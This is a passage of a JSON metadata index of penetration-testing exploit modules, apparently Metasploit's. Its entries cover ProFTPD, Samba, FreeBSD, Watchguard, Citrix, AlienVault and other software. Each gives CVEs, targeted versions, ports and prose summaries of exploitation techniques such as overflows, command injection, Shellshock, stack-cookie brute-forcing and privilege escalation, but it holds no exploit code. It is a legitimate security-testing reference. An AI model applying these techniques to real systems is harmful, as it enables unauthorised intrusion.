"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/dialup/multi/login/manyargs.rb",
"is_install_path": true,
"ref_name": "dialup/multi/login/manyargs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_firefox/local/exec_shellcode": {
"name": "Firefox Exec Shellcode from Privileged Javascript Shell",
"full_name": "exploit/firefox/local/exec_shellcode",
"rank": 600,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows execution of native payloads from a privileged Firefox Javascript shell.\n It places the specified payload into memory, adds the necessary protection flags,\n and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter\n session without touching the disk.",
"references": [
],
"platform": "Firefox",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/firefox/local/exec_shellcode.rb",
"is_install_path": true,
"ref_name": "firefox/local/exec_shellcode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/ftp/proftp_telnet_iac": {
"name": "ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)",
"full_name": "exploit/freebsd/ftp/proftp_telnet_iac",
"rank": 500,
"disclosure_date": "2010-11-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions of ProFTPD\n server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n large number of Telnet IAC commands, an attacker can corrupt memory and\n execute arbitrary code.",
"references": [
"CVE-2010-4221",
"OSVDB-68985",
"BID-44562"
],
"platform": "BSD",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"Debug",
"ProFTPD 1.3.2a Server (FreeBSD 8.0)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb",
"is_install_path": true,
"ref_name": "freebsd/ftp/proftp_telnet_iac",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/http/watchguard_cmd_exec": {
"name": "Watchguard XCS Remote Command Execution",
"full_name": "exploit/freebsd/http/watchguard_cmd_exec",
"rank": 600,
"disclosure_date": "2015-06-29",
"type": "exploit",
"author": [
"Daniel Jensen <daniel.jensen@security-assessment.com>"
],
"description": "This module exploits two separate vulnerabilities found in the Watchguard XCS virtual\n appliance to gain command execution. By exploiting an unauthenticated SQL injection, a\n remote attacker may insert a valid web user into the appliance database, and get access\n to the web interface. On the other hand, a vulnerability in the web interface allows the\n attacker to inject operating system commands as the 'nobody' user.",
"references": [
"CVE-2015-5453",
"URL-http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf"
],
"platform": "BSD",
"arch": "x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Watchguard XCS 9.2/10.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/freebsd/http/watchguard_cmd_exec.rb",
"is_install_path": true,
"ref_name": "freebsd/http/watchguard_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_freebsd/local/intel_sysret_priv_esc": {
"name": "FreeBSD Intel SYSRET Privilege Escalation",
"full_name": "exploit/freebsd/local/intel_sysret_priv_esc",
"rank": 500,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"Rafal Wojtczuk",
"John Baldwin",
"iZsh",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the FreeBSD kernel,\n when running on 64-bit Intel processors.\n\n By design, 64-bit processors following the X86-64 specification will\n trigger a general protection fault (GPF) when executing a SYSRET\n instruction with a non-canonical address in the RCX register.\n\n However, Intel processors check for a non-canonical address prior to\n dropping privileges, causing a GPF in privileged mode. As a result,\n the current userland RSP stack pointer is restored and executed,\n resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n FreeBSD 8.3-RELEASE (amd64); and\n FreeBSD 9.0-RELEASE (amd64).",
"references": [
"BID-53856",
"CVE-2012-0217",
"EDB-28718",
"PACKETSTORM-113584",
"URL-https://www.freebsd.org/security/patches/SA-12:04/sysret.patch",
"URL-https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/",
"URL-https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c",
"URL-https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/",
"URL-http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc",
"URL-https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation"
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-12-21 15:40:01 +0000",
"path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/intel_sysret_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/local/mmap": {
"name": "FreeBSD 9 Address Space Manipulation Privilege Escalation",
"full_name": "exploit/freebsd/local/mmap",
"rank": 500,
"disclosure_date": "2013-06-18",
"type": "exploit",
"author": [
"Konstantin Belousov",
"Alan Cox",
"Hunger",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability that can be used to modify portions of\n a process's address space, which may lead to privilege escalation. Systems\n such as FreeBSD 9.0 and 9.1 are known to be vulnerable.",
"references": [
"CVE-2013-2171",
"OSVDB-94414",
"EDB-26368",
"BID-60615",
"URL-http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc"
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"FreeBSD x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/local/mmap.rb",
"is_install_path": true,
"ref_name": "freebsd/local/mmap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/local/watchguard_fix_corrupt_mail": {
"name": "Watchguard XCS FixCorruptMail Local Privilege Escalation",
"full_name": "exploit/freebsd/local/watchguard_fix_corrupt_mail",
"rank": 0,
"disclosure_date": "2015-06-29",
"type": "exploit",
"author": [
"Daniel Jensen <daniel.jensen@security-assessment.com>"
],
"description": "This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called\n by root's crontab which can be exploited to run a command as root within 3 minutes.",
"references": [
"URL-http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf"
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Watchguard XCS 9.2/10.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb",
"is_install_path": true,
"ref_name": "freebsd/local/watchguard_fix_corrupt_mail",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/misc/citrix_netscaler_soap_bof": {
"name": "Citrix NetScaler SOAP Handler Remote Code Execution",
"full_name": "exploit/freebsd/misc/citrix_netscaler_soap_bof",
"rank": 300,
"disclosure_date": "2014-09-22",
"type": "exploit",
"author": [
"Bradley Austin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.\n The vulnerability exists in the SOAP handler, accessible through the web interface. A\n malicious SOAP requests can force the handler to connect to a malicious NetScaler config\n server. This malicious config server can send a specially crafted response in order to\n trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary\n code with the privileges of the web server running the SOAP handler. This module has been\n tested successfully on the NetScaler Virtual Appliance 450010.",
"references": [
"URL-http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html"
],
"platform": "BSD",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NetScaler Virtual Appliance 450010"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb",
"is_install_path": true,
"ref_name": "freebsd/misc/citrix_netscaler_soap_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/samba/trans2open": {
"name": "Samba trans2open Overflow (*BSD x86)",
"full_name": "exploit/freebsd/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the flaw on x86 Linux systems that do not\n have the noexec stack option set.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "BSD",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/freebsd/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "freebsd/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/tacacs/xtacacsd_report": {
"name": "XTACACSD report() Buffer Overflow",
"full_name": "exploit/freebsd/tacacs/xtacacsd_report",
"rank": 200,
"disclosure_date": "2008-01-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By\n sending a specially crafted XTACACS packet with an overly long\n username, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-7232",
"OSVDB-58140",
"URL-http://aluigi.altervista.org/adv/xtacacsdz-adv.txt"
],
"platform": "BSD",
"arch": "x86",
"rport": 49,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"FreeBSD 6.2-Release Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/tacacs/xtacacsd_report.rb",
"is_install_path": true,
"ref_name": "freebsd/tacacs/xtacacsd_report",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/telnet/telnet_encrypt_keyid": {
"name": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow",
"full_name": "exploit/freebsd/telnet/telnet_encrypt_keyid",
"rank": 500,
"disclosure_date": "2011-12-23",
"type": "exploit",
"author": [
"Jaime Penalba Estebanez <jpenalbae@gmail.com>",
"Brandon Perry <bperry.volatile@gmail.com>",
"Dan Rosenberg",
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in the encryption option handler of the\n FreeBSD telnet service.",
"references": [
"CVE-2011-4862",
"OSVDB-78020",
"BID-51182",
"EDB-18280"
],
"platform": "BSD",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": [
"Automatic",
"FreeBSD 8.2",
"FreeBSD 8.1",
"FreeBSD 8.0",
"FreeBSD 7.3/7.4",
"FreeBSD 7.0/7.1/7.2",
"FreeBSD 6.3/6.4",
"FreeBSD 6.0/6.1/6.2",
"FreeBSD 5.5",
"FreeBSD 5.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb",
"is_install_path": true,
"ref_name": "freebsd/telnet/telnet_encrypt_keyid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_hpux/lpd/cleanup_exec": {
"name": "HP-UX LPD Command Execution",
"full_name": "exploit/hpux/lpd/cleanup_exec",
"rank": 600,
"disclosure_date": "2002-08-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploit abuses an unpublished vulnerability in the\n HP-UX LPD service. This flaw allows an unauthenticated\n attacker to execute arbitrary commands with the privileges\n of the root user. The LPD service is only exploitable when\n the address of the attacking system can be resolved by the\n target. This vulnerability was silently patched with the\n buffer overflow flaws addressed in HP Security Bulletin\n HPSBUX0208-213.",
"references": [
"CVE-2002-1473",
"OSVDB-9638",
"URL-http://archives.neohapsis.com/archives/hp/2002-q3/0064.html"
],
"platform": "HPUX,Unix",
"arch": "cmd",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/hpux/lpd/cleanup_exec.rb",
"is_install_path": true,
"ref_name": "hpux/lpd/cleanup_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_irix/lpd/tagprinter_exec": {
"name": "Irix LPD tagprinter Command Execution",
"full_name": "exploit/irix/lpd/tagprinter_exec",
"rank": 600,
"disclosure_date": "2001-09-01",
"type": "exploit",
"author": [
"optyx <optyx@no$email.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution flaw in\n the in.lpd service shipped with all versions of Irix.",
"references": [
"CVE-2001-0800",
"OSVDB-8573"
],
"platform": "Irix,Unix",
"arch": "cmd",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/irix/lpd/tagprinter_exec.rb",
"is_install_path": true,
"ref_name": "irix/lpd/tagprinter_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/antivirus/escan_password_exec": {
"name": "eScan Web Management Console Command Injection",
"full_name": "exploit/linux/antivirus/escan_password_exec",
"rank": 600,
"disclosure_date": "2014-04-04",
"type": "exploit",
"author": [
"Joxean Koret",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in the eScan Web Management\n Console. The vulnerability exists while processing CheckPass login requests. An attacker\n with a valid username can use a malformed password to execute arbitrary commands. With\n mwconf privileges, the runasroot utility can be abused to get root privileges. This module\n has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.",
"references": [
"URL-http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz"
],
"platform": "Linux",
"arch": "x86",
"rport": 10080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"eScan 5.5-2 / Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/antivirus/escan_password_exec.rb",
"is_install_path": true,
"ref_name": "linux/antivirus/escan_password_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/browser/adobe_flashplayer_aslaunch": {
"name": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability",
"full_name": "exploit/linux/browser/adobe_flashplayer_aslaunch",
"rank": 400,
"disclosure_date": "2008-12-17",
"type": "exploit",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "This module exploits a vulnerability in Adobe Flash Player for Linux,\n version 10.0.12.36 and 9.0.151.0 and prior.\n An input validation vulnerability allows command execution when the browser\n loads a SWF file which contains shell metacharacters in the arguments to\n the ActionScript launch method.\n\n The victim must have Adobe AIR installed for the exploit to work. This module\n was tested against version 10.0.12.36 (10r12_36).",
"references": [
"CVE-2008-5499",
"OSVDB-50796",
"BID-32896",
"URL-http://www.adobe.com/support/security/bulletins/apsb08-24.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb",
"is_install_path": true,
"ref_name": "linux/browser/adobe_flashplayer_aslaunch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ftp/proftp_sreplace": {
"name": "ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",
"full_name": "exploit/linux/ftp/proftp_sreplace",
"rank": 500,
"disclosure_date": "2006-11-26",
"type": "exploit",
"author": [
"Evgeny Legerov <admin@gleg.net>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions 1.2 through\n 1.3.0 of ProFTPD server. The vulnerability is within the \"sreplace\" function\n within the \"src/support.c\" file.\n\n The off-by-one heap overflow bug in the ProFTPD sreplace function has been\n discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n this off-by-one bug via MKD command, but failed. We did not work on this bug\n since then.\n\n Actually, there are exists at least two bugs in sreplace function, one is the\n mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow\n via 'sstrncpy(dst,src,negative argument)'.\n\n We were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n version, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n 1. another (integer) overflow in sreplace!\n 2. now it is possible to reach sreplace stack-based buffer overflow bug via\n the \"pr_display_file\" function!\n 3. stupid '.message' file display bug\n\n So we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n To reach the bug, you need to upload a specially created .message file to a\n writeable directory, then do \"CWD <writeable directory>\" to trigger the invocation\n of sreplace function.\n\n Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'\n file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n The exploit is a part of VulnDisco Pack since Dec 2005.",
"references": [
"CVE-2006-5815",
"OSVDB-68985",
"BID-20992",
"URL-https://seclists.org/bugtraq/2006/Nov/94",
"URL-https://seclists.org/bugtraq/2006/Nov/538",
"URL-http://bugs.proftpd.org/show_bug.cgi?id=2858",
"URL-http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h"
],
"platform": "Linux",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"Debug",
"ProFTPD 1.3.0 (source install) / Debian 3.1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/ftp/proftp_sreplace.rb",
"is_install_path": true,
"ref_name": "linux/ftp/proftp_sreplace",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ftp/proftp_telnet_iac": {
"name": "ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",
"full_name": "exploit/linux/ftp/proftp_telnet_iac",
"rank": 500,
"disclosure_date": "2010-11-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions of ProFTPD\n server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n large number of Telnet IAC commands, an attacker can corrupt memory and\n execute arbitrary code.\n\n The Debian Squeeze version of the exploit uses a little ROP stub to indirectly\n transfer the flow of execution to a pool buffer (the cmd_rec \"res\" in\n \"pr_cmd_read\").\n\n The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub\n to it, and execute the stub. The stub then copies the remainder of the payload\n in and executes it.\n\n NOTE: Most Linux distributions either do not ship a vulnerable version of\n ProFTPD, or they ship a version compiled with stack smashing protection.\n\n Although SSP significantly reduces the probability of a single attempt\n succeeding, it will not prevent exploitation. Since the daemon forks in a\n default configuration, the cookie value will remain the same despite\n some attempts failing. By making repeated requests, an attacker can eventually\n guess the cookie value and exploit the vulnerability.\n\n The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness\n and could allow exploitation in semi-reasonable amount of time.",
"references": [
"CVE-2010-4221",
"OSVDB-68985",
"BID-44562"
],
"platform": "Linux",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"Debug",
"ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1",
"ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)",
"ProFTPD 1.3.2c Server (Ubuntu 10.04)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/ftp/proftp_telnet_iac.rb",
"is_install_path": true,
"ref_name": "linux/ftp/proftp_telnet_iac",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/games/ut2004_secure": {
"name": "Unreal Tournament 2004 \"secure\" Overflow (Linux)",
"full_name": "exploit/linux/games/ut2004_secure",
"rank": 400,
"disclosure_date": "2004-06-18",
"type": "exploit",
"author": [
"onetwo"
],
"description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.",
"references": [
"CVE-2004-0608",
"OSVDB-7217",
"BID-10570"
],
"platform": "Linux",
"arch": "",
"rport": 7787,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"UT2004 Linux Build 3120",
"UT2004 Linux Build 3186"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/games/ut2004_secure.rb",
"is_install_path": true,
"ref_name": "linux/games/ut2004_secure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/accellion_fta_getstatus_oauth": {
"name": "Accellion FTA getStatus verify_oauth_token Command Execution",
"full_name": "exploit/linux/http/accellion_fta_getstatus_oauth",
"rank": 600,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a metacharacter shell injection vulnerability in the Accellion\n File Transfer appliance. This vulnerability is triggered when a user-provided\n 'oauth_token' is passed into a system() call within a mod_perl handler. This\n module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include\n '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on\n version FTA_9_11_200, but may apply to previous versions as well. This issue was\n fixed in software update FTA_9_11_210.",
"references": [
"URL-http://r-7.co/R7-2015-08",
"CVE-2015-2857"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb",
"is_install_path": true,
"ref_name": "linux/http/accellion_fta_getstatus_oauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/advantech_switch_bash_env_exec": {
"name": "Advantech Switch Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/linux/http/advantech_switch_bash_env_exec",
"rank": 600,
"disclosure_date": "2015-12-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the 'ping.sh' CGI\n script, accessible through the Boa web server on Advantech switches. This module\n was tested against firmware version 1322_D1.98.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2018-09-17 22:29:20 +0000",
"path": "/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/advantech_switch_bash_env_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_linux/http/airties_login_cgi_bof": {
"name": "Airties login-cgi Buffer Overflow",
"full_name": "exploit/linux/http/airties_login_cgi_bof",
"rank": 300,
"disclosure_date": "2015-03-31",
"type": "exploit",
"author": [
"Batuhan Burakcin <batuhan@bmicrosystems.com>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote buffer overflow vulnerability on several Airties routers.\n The vulnerability exists in the handling of HTTP queries to the login cgi with long\n redirect parameters. The vulnerability doesn't require authentication. This module has\n been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.\n Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,\n Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.",
"references": [
"CVE-2015-2797",
"EDB-36577",
"URL-http://www.bmicrosystems.com/exploits/airties5650tt.txt"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AirTies_Air5650v3TT_FW_1.0.2.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/airties_login_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/airties_login_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/alcatel_omnipcx_mastercgi_exec": {
"name": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",
"full_name": "exploit/linux/http/alcatel_omnipcx_mastercgi_exec",
"rank": 0,
"disclosure_date": "2007-09-09",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\n Communication Server 7.1 and earlier. The Unified Maintenance Tool\n contains a 'masterCGI' binary which allows an unauthenticated attacker\n to execute arbitrary commands by specifying shell metacharaters as the\n 'user' within the 'ping' action to obtain 'httpd' user access. This\n module only supports command line payloads, as the httpd process kills\n the reverse/bind shell spawn after the HTTP 200 OK response.",
"references": [
"OSVDB-40521",
"BID-25694",
"CVE-2007-3010",
"URL-http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/alcatel_omnipcx_mastercgi_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/alienvault_exec": {
"name": "AlienVault OSSIM/USM Remote Code Execution",
"full_name": "exploit/linux/http/alienvault_exec",
"rank": 600,
"disclosure_date": "2017-01-31",
"type": "exploit",
"author": [
"Peter Lapp",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together.\n Unauthenticated users can execute arbitrary commands under the context of the root user.\n\n By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability\n which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue\n action and policy that enables to execute operating system commands by using captured session token. As a final step,\n SSH login attempt with an invalid credentials can trigger a created rogue policy which triggers an action that executes\n operating system command with root user privileges.\n\n This module was tested against following product and versions:\n AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0\n AlienVault OSSIM 5.0.0, 4.6.1",
"references": [
"CVE-2016-8582",
"URL-https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/",
"EDB-40682"
],
"platform": "Python",
"arch": "python",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Alienvault USM/OSSIM <= 5.3.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/alienvault_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/alienvault_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/alienvault_sqli_exec": {
"name": "AlienVault OSSIM SQL Injection and Remote Code Execution",
"full_name": "exploit/linux/http/alienvault_sqli_exec",
"rank": 600,
"disclosure_date": "2014-04-24",
"type": "exploit",
"author": [
"Sasha Zivojinovic",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault\n OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an\n active admin session ID. If an administrator level user is identified, remote code execution\n can be gained by creating a high priority policy with an action containing our payload.",
"references": [
"CVE-2016-8581",
"OSVDB-106252",
"EDB-33006"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Alienvault OSSIM 4.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/alienvault_sqli_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/alienvault_sqli_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
